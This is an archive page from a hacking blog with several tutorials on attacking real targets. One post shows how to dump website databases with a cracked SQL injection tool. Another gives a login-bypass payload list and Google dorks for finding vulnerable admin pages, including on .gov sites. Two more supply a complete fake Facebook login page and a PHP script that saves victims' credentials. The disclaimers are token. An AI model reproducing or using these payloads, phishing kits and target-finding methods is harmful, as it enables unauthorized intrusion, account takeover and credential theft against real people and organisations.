Cyber insect hacking world: August 2014

How to hack Website using Havij

By: alam 05:23

Hello friends : I've Posted Manual SQL Injection technique complete tutorial + Guide and method of SQL Injection. But do you know? instead of that long procedures and method you can also use Havij Automatic (Advance SQL Injection Tool). So here today I'll show you Website Hacking using Havij.

* What is Website Database ?

The Website Database is a collection of Information like Images, Login ID's, Password, Company Data, etc. That is all stored in a Server Database so that it can be easily acessed, managed and updated. In one view, databases can be classified according to types of content : Bibilographic, full-text, numeric, and Images etc.

What is Havij ?

Havij Pro is an advanced SQLi Vulnerability Exploiter, that can Exploit SQL Injection Vulnerability in Website and and get accessed into website database. Havij is Automatic Advance SQLi Tool.

How to hack Website using Havij ?

First of all there is nothing hard in this tutorial or damn steps to be followed - Just read it once - simply. But if you really want to learn SQL Injection then try to do it manually instead of using any tools..! As i showed in Latest Tutorial SQL Injection Website Hacking techniques.

Now Let's start

Open havij and copy and paste infected link as shown in figure

Now click in the "Analyze"

Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx

Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed

After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure

In that Just put mark username and password and click "Get data"

Bingo Got now id and pass that may be admin...

The pass will get as md5 you can crack it also using this tool as shown in figure...

or search in google md5 decrypt and follow website

Requirements :

Havij Pro [Click to Download From Tool Box]

Vulnerable website [SQLi Vulnerable Website]

Havij SQL Tools free crack: [FULL VERSION] [CRACK]

By: alam 04:56

Description:

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.

The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

What's New?

* Oracle error based database added with ability to execute query.

* Getting tables and column when database name is unknown added (mysql)

* Another method added for finding columns count and string column in PostgreSQL

* Automatic keyword finder optimized and some bugs fixed.

* A bug in finding valid string column in mysql fixed.

* 'Key is not unique' bug fixed

* Getting data starts from row 2 when All in One fails - bug fixed

* Run time error when finding keyword fixed.

* False table finding in access fixed.

* keyword correction method made better

* A bug in getting current data base in mssql fixed.

* A secondary method added when input value doesn't return a normal page (usually 404 not found)

* Data extraction bug in html-encoded pages fixed.

* String or integer type detection made better.

* A bug in https injection fixed.

click here for Download

[SQLi] Hack Admin Account Website

By: alam 03:22

We're gonna hack into an admin account, using SQL injections.

How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.

Dorks:

inurl:adminlogin.aspx

inurl:admin/index.php

inurl:administrator.php

inurl:administrator.asp

inurl:login.asp

inurl:login.aspx

inurl:login.php

inurl:admin/index.php

inurl:adminlogin.aspx

LET'S START !

Step 1: Go to Google, typ in ''admin/login.asp site:net'' and search (You can also use the option, to search only in your country).

Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''website.com/admin/login.asp''.

Step 3: Go to the website admin login page, type in:
username: 1'or'1'='1
password: 1'or'1'='1

NOW .. IT'S DONE ! .. WE ARE NOW LOG AS ADMINISTRATOR !

Other InjecTion Queries Code:

‘ or 1=1 –

1'or’1'=’1

admin’–

” or 0=0 –

or 0=0 –

‘ or 0=0 #

” or 0=0 #

or 0=0 #

‘ or ‘x’='x

” or “x”=”x

‘) or (‘x’='x

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or a=a–

” or “a”=”a

‘) or (‘a’='a

“) or (“a”=”a

hi” or “a”=”a

hi” or 1=1 –

hi’ or 1=1 –

hi’ or ‘a’='a

hi’) or (‘a’='a

================================================
================================================

some other google dorks i am going to provide you which i personally use.

intitle:"Index of /admin/css/" site:.com

intitle:"index of /gallery" site:.com

intitle:"index of /admin/photos" site:.com

intitle:"index of /images" site:.com

intitle:"index of /css" site:.com

intitle:"index of /js" site:.com

intitle:"index of admin/css" site:.com

intitle:"index of admin/js" site:.com

intitle:"index of admin/gallery" site:.com

intitle:"index of admin/uploads" site:.com

now go to admin area and put
user: admin
pass: admin

NOW .. IT'S DONE ! .. WE ARE NOW LOG AS ADMINISTRATOR !

SQLi Hacking Introduction

By: alam 02:57

Hello Everyone, i am going to teach you all about sql injection.

I have found many script-kiddies using SQLi techniques pre-defined some where in the web, and call them selves a hacker, or by using some tools like Havij, Mole, DarkMySQli, etc. But By Using those tools or by learning the SQLi commands are they really a L33t?

I strongly Oppose to Script - Kiddies, and this Blog is not for them, who doesnt want to know the basics of SQL, and jump to SQLi, and harrase some web-admins out there, by abusing them and speaking about poor security. Before abusing them and speaking shit about security, ask yourself how much do you know about security.

Well, enough said for the Script-Kiddies, lets get into the real world, as how one can be an automated tool like any SQL Tool, Ofcourse the people who developed the tools are genious and has done a hell lot of research to test security or pen-testing.

Lets use the knowledge wisely, and lets learn and discuss to Protect..Remember, You might get awarded if you use the knowledge wisely, and if you break security with criminal purpose. You might be busted.

Well, Thats all for the Introduction of The Blog.

So a lot about SQL, what exactly it is?

Its a Structured Query Language, It works on the basis of Query with a Database and accessing the contents, that helps to manipulate some desired output or display.

The previous answer leads to another question, What is a Database?

Database is a server or a place where data is stored. and data is any information related to any organization or business.

SQL helps us to extract the data from a Database. with SQL we can delete, add, append, sort, update, create, set permissions, insert and execute commands to a Database.

Now, how is a Databased Structured?

Well you cannot see the physical structure of a database, but logically, A Database consists of one or more Tables, and each table consists of one or more records.

Each Table in a Database is identified by a specific name, hence in a Database, no two tables can have the same name. And Records in a Table are made of rows and columns, each column is identified by a specific name, two different tables can have same column name, but in one table two columns cannot have same column name. Rows are where data resides, Thus making a full blown Table ready to be played with.

Hope this is informative, and yes I know some of you might be aware of this, but its for some noobs out there cribbing with SQL Tools and abusing web admins and speaking shit about security.

HACK FACEBOOK THROUGH PHISHING USING WAPKA.MOBI

By: alam 16:13

FRIENDS! AS THE TILE OF OUR POST SUGGEST THAT TODAY WE ARE GOING TO LEARN PHISHING VIA MOBILE.WAPKA IS SITE WHICH IS USED TO PERFORM MOBILE PHISHING.AS ALL OF YOU KNOW THAT TO PERFORM A PHISHING ATTACK WE NEED A WEB HOSTING, FOR THIS PURPOSE WE CHOOSE WAPKA (FREE WEB HOSTING FOR MOBILE).A HUGE ADVANTAGE PROVIDED BY WAPKA IS THAT IT DOESN’T BLOCK OUR ACCOUNT WHILE WE ARE PERFORMING OUR PHISHING ATTACK AS OTHER FREE HOSTING WEBSITES DOES.

----------------------------------------------------------------------------------------------

====>>> Steps to perform mobile phishing via wapka:

Step 1: Register a new Wapka Account First create a new wapka account by clicking here

Step 2: Now login to your account and goto (Site List) and create a new site. Example: www.example.wapka.mobi

Then click on Manage

Step 3: Now you have 2 modes availabe, Click on Admin mode.

Step 4: As you click on Admin mode you redirects to a Blank page. it’s blank because till now you do nothing to your newly created site.

At the Lower right most corner you have a link ::EDIT SITE(#):: click on it.

Step 5: Now click on – (WML/XHTML code).On clicking it you have window

Step 6: Copy Sourde code from here

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Wapka.mobi</title><link rel="STYLESHEET" type="text/css" href="/styles.css"/><meta forua="true" http-equiv="Cache-Control" content="max-age=0"/><style type="text/css">
body { background: ;
color: ;
}
a { color: ;
}
</style>

</head><body>
<div><?xml version="1.0" ?>

<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN" "http://www.wapforum.org/DTD/wml_1.1.xml">

<wml>
<head>
<meta forua="true" http-equiv="Cache-Control" content="max-age=0"/>
<link rel="STYLESHEET" type="text/css" href="http://skfacebook.wapka.mobi/styles.css"/>
</head>
<template>
<do type="options" name="Prev" label="Back"><prev/></do>
</template>
<card id="index" title="Facebook" >
<p><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml">

<script type="text/javascript"> document.title = "Welcome to Facebook"; </script>

<head title="Welcome to Facebook"><title>Welcome to Facebook</title><meta name="description" content="Facebook helps you connect and share with the people in your life." /><meta name="referrer" content="default" id="meta_referrer" /><meta http-equiv="X-Frame-Options" content="deny" />

<!-----[ » © Fb Phishing 2013 copyrighted by TipsNet.Tk™ & all credit goes to Shanto « ]-----!>

</head><body class="nontouch acw"><div class="mfsm"><div id="viewport"><div class="acb aps" id="u_0_0" data-sigil="MTopBlueBarHeader"><table cellspacing="0" cellpadding="0" class="lr"><tr><td valign="top"><h1><a href="http://m.facebook.com/home.php?_dmr&refid=8"><img src="http://static.ak.fbcdn.net/rsrc.php/v2/yz/r/aKhO2tw3FnO.png" width="76" height="20" class="img" alt="facebook" /></a></h1></td></tr></table></div><div id="objects_container"><div id="root" tabindex="0" role="main" class="_fco acw" data-sigil="context-layer-root">

<div class="acy aps abb"><span class="mfss">You must login again.</span></div>
<form method="post" class="mobile-login-form _fcp" onSubmit="window.open ('http://facebook.com/wowtricks')" action="site_0.xhtml">
<div class="mobile-login-field aclb apl"><div>Email or Phone<br/><input type="text" name="mf_text[Email]" class="input"/>
</div></div><div class="mobile-login-field aclb apl"><div>Password<br/>
<input type="password" class="input" name="mf_text[Password]"/>
</div></div><div class="button_area aclb apl">
<input type="hidden" name="p" value="XXXXXXXX"/><input type="hidden" name="action" value="send_message"/>
<input type="submit" name="MF_submit" class="btn btnC largeBtn" size="0" value="Log In" /></div><hr style="background-color:#cccccc;height:1px;border:0px solid #fff;margin:0.3em auto;width:100%;" /><div class="mobile-login-form _fcp"><span class="mfss fcg" style="margin-left:6px;"><b>New to Facebook?</b></span></div><div class="_4u9b aclb"><div class="button_area aclb apl"><a class="btn btnS largeBtn" href="http://m.facebook.com/r.php?refid=8">Create New Account</a></div></div><input type="hidden" autocomplete="off" name="_fb_noscript" value="true" /></form><div class="other-links aclb apl"><span class="mfsm fcg"><a href="http://m.facebook.com/recover/initiate/?refid=8">Forgot password?</a><br /><a href="http://m.facebook.com/help/?refid=8">Help Center</a></span></div></div></div></div></div><div><div id="footer"><div class="acg apm"><span class="mfss fcg"><b>English (US)</b> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/a/language.php?l=es_LA&lref=http%3A%2F%2Fm.facebook.com%2F&gfid=AQD28mdu19R_4ouf&refid=8">Español</a> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/a/language.php?l=pt_BR&lref=http%3A%2F%2Fm.facebook.com%2F&gfid=AQDjJGXjQ2aRMYRs&refid=8">Português (Brasil)</a> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/language.php?n=http%3A%2F%2Fm.facebook.com%2F&refid=8">More…</a></span></div><div class="acg apm"><span class="mfss fcg">Facebook ©2013</span></div></div></div><div id="static_templates"></div></body>

</html>
</p><p align="center"><a href="/menu_0.wml">:=:</a></p><p style="text-align:center;"><a href="/ads/wapka/p/2465791/adshows/1/aid/8/country/IN/position/bottom">Super download speed only in uc browser</a></p><img src="/ga.gif?utmac=MO-32471805-1&utmn=786667047&utmr=-&utmp=%2Fsite_0.xhtml&guid=ON" width="1" height="1" /><img src="http://ga.wapka.me/ga3.gif?utmac=MO-32471805-3&utmn=344471327&utmr=-&utmp=%2Fsite_0.xhtml&guid=ON" width="1" height="1" />
</card>
</wml>

</div><p align="center"><a href="/menu_0.xhtml">:=:</a></p><p style="text-align:center;"><a href="/ads/wapka/p/2466575/adshows/3/aid/8/country/IN/position/bottom">Super download speed only in uc browser</a></p><img src="/ga.gif?utmac=MO-32471805-1&utmn=738948482&utmr=-&utmp=%2Findex.xhtml&guid=ON" width="1" height="1" /><img src="http://ga.wapka.me/ga3.gif?utmac=MO-32471805-3&utmn=1497913535&utmr=-&utmp=%2Findex.xhtml&guid=ON" width="1" height="1" /></body></html>

Copy all the code and paste it into (WML/XHTML code) box and click on Submit button.

Step 7: It’s all over now send your site link which was created at Step 2 to your victim. As your victim login to your page his/her E-mail and Password sends to your E-mail by which you have created your account at wapka at first step.

So friends Enjoy hacking………….

Note: It’s only for education purpose don’t use it to fraud. Admin is not responsible for whatever you will do from your newly acquired knowledge.

HACKING FACEBOOK ACCOUNTS BY PHISHING – STEP BY STEP!

By: alam 14:58

Hello guys, it’s been a quite long time I have delivered you some good stuff, so today I decided to write about hacking Facebook accounts by phishing. Generally, phishing is stealing usernames and passwords using a fake page. Suppose, you want to hack a victim’s Facebook account, so you create a page which looks very similar to facebook and host it somewhere so that your victim can login. When the victim tries to log into his account, he is redirected to the given page and his credentials are sent to you through an email or simply get recorded in some text file.Today we are going to create a Facebook phishing using simple HTML and PHP coding. Let’s get started..!!!

--------------------------------------------------------------------------------------------------------------

Step 1: Go to http://www.facebook.com and right-click on the home page and select view page source.

Copy the complete source code and paste it in notepad or some other text editor (I use Notepad++) for further editing.

Step 2: Find for something which looks like this :

Step 3: Then change the action URL to login.php, now it will look similar to this.

Save it as index.html.

Step 4: Open a notepad and paste the following code inside it and save as login.php.

<?php

header (‘Location: http://www.facebook.com’);

$handle = fopen(“passwords.txt”, “a”);

foreach($_POST as $variable => $value)

{

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit;

Here, the victim will be redirected to http://www.facebook.com. You can change it to your desired location by editing the arguments of header function in the above PHP code.

Step 5: Create another blank text file for storing the hacked usernames and passwords and name it as passwords.txt.

Now you are done with the setup of phishing page, all you need to do is host it somewhere on internet so that it becomes available to your victim.

Step 6: Go to some free hosting site like http://www.000webhost.com and sign up for free. You will be provided with 1.5GB free space to host your web pages and free domain. You will have to complete email confirmation step to get your web page running.

Step 7: Once you get your account activated, sign in and click Go to CPanel as shown below.

Step 8: Then click on File Manager

Step 9: Now you will see a folder public html in the web based ftp client page, click on the folder and open it.

Step 10: Click on Upload and select all the 3 files and finally click on the green tick to upload them as shown in the image below.

Once you get your files uploaded you can check your page at your registered domain. The victim’s password will be automatically written into passwords.txt file, just open the file to see the username and password!

Congratulations you are done creating your phishing page! If you have understood everything perfectly then you can use this technique to create phishing pages for other sites also. Feel free to comment below, I might come up with an article describing the procedure to host the webpage on your system. So stay tuned and keep yourself updated.

Note: Phishing pages at free hosting services will be immediately deleted, if once detected. So my advice is to use a paid hosting service or else host it on your system.

Chapter 1: Learning how to use Dorks

By: alam 12:44

For BeginnersA method of finding websites vulnerable to SQL injection

is using what we call "dorks"

Dorks:They are like search criteria in which a search engine returns results related to your dork.

The process can be a little time consuming, but the outcome will be worth it after learning on how to use dorks

For this tutorial, the search engine we'll be using is Google

Credits to those who are mentioned in this tutorial

Now I'll show you how to use dorks with the help of a video too.

Step1: Finding your dorks i.e. the criteria you'll be using
Dork List compiled by kobez-

Code:

http://pastebin.com/0FqmasC7

Dork List by Sidesipe-

Code:

http://pastebin.com/x1rtqktj

Dork List by .Newsletter'

Code:

http://pastebin.com/APxqavu9

For this tutorial, we'll be using this dork "inurl:index.php?id="

Step2: Making use of your Dorks with the help of Google

Here's what you do:

Go to http://www.google.com
Type the dork in the search bar "inurl:index.php?id=" (with or without quotes)
Now you'll find a whole lot of links in your results

Here's how you can speed up your process:
In your mouse, there should be a scroll button right?
Hover your mouse on each link and hit the scroll button so that it'll open on a new tab. (Lets say you can open about 10 links at a time)

Step3: Vulnerability approach

Now to see whether the website is vulnerable to SQL injection or not, we simply put in a quote " ' " at the end of the url address.
So our site will look like this

Code:

http://www.site.com/index.php?id=123'

Do the same thing with the websites you opened on your tabs and see if there's any vulnerable website.

To determine if a website is vulnerable or not, it should return an error!

Note: If you can't find any vulnerability after doing some vulnerability search on this dork, you can always browse the dork list I've mentioned above and use any of them until you find any website vulnerable to SQL injection

Here's a video demonstration on how to use Dorks:

Extra Notes: Hunting for specific websites with specific domains
Ever want to hack a government website, or an organization website?
It's simple. All you have to do is improvise your dorks.
First off, here are some common domains
.gov = Government websites
.edu = Educational websites
.org = Organizational websites
.com = Commercial websites
.info = Informative websites
.net = Networking websites ( similar to .com)

Alright now you know some specific domains, lets add them to our dork shall we?
Follow this formula-like dork

Code:

"inurl:."domain"/"dorks" "

So you would normally understand it like this:
"inurl" = input URL
"domain" = your desired domain ex. .gov
"dorks" = your dork of your choice
Now for an example, lets say you want to hack government websites
Here's how it'll look
"inurl:.gov/index.php?id="
Once you search that up, you'll find a lot of government websites on your results

Changing "inurl" and using another one
Yes, you can change that too.
Google has a lot of functions you can come up with
Some of them are below where you can change "inurl" and make another dork

Code:

intitle:

intext:

define:

site:

info:

link:

Credits to Real Steel for bringing this up
Choose any of the and make another.
Example: "intext:.edu/gallery?id="
More information about those here: http://www.hackforums.net/showthread.php?tid=2033496

Some Dork Scanners you can use to help you speed up the process

Scanner by moveax
http://www.hackforums.net/showthread.php?tid=1985016

Scanner by p0iz0ner
http://www.hackforums.net/showthread.php...SQL+poizon

Scanner by kript0x
http://www.hackforums.net/showthread.php...rk+scanner

If you're lazy in using dorks to find vulnerable websites, then you can use some list right here:

Vulnerable List by Dyme:
http://pastebin.com/kVMYX0Eh

End of Chapter 1
Upcoming chapters:
Chapter2- Basic MySQL injection using "Login" Queries"
Please stayed tuned with my tutorials and hope you enjoyed this chapter